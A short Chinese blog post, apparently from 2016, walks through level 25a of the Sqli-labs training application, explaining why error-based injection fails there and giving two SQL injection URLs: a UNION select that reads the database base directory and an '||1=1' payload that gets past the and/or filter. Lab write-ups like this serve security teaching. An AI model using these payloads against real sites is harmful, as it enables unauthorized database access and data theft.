Sqli-labs less 25a

Less-25a

不同于25关的是sql语句中对于id，没有''的包含，同时没有输出错误项，报错注入不能用。其余基本上和25示例没有差别。此处采取两种方式：延时注入和联合注入。

http://127.0.0.1/sqllib/Less-25a/?id=-1%20UNION%20select%201,@@basedir,3%23

此处我们依旧用|| &&来代替and，or。

http://127.0.0.1/sqllib/Less-25a/?id=20||1=1--+

posted @ 2016-08-11 22:31 lcamry 阅读(697) 评论(0) 编辑收藏举报

刷新页面返回顶部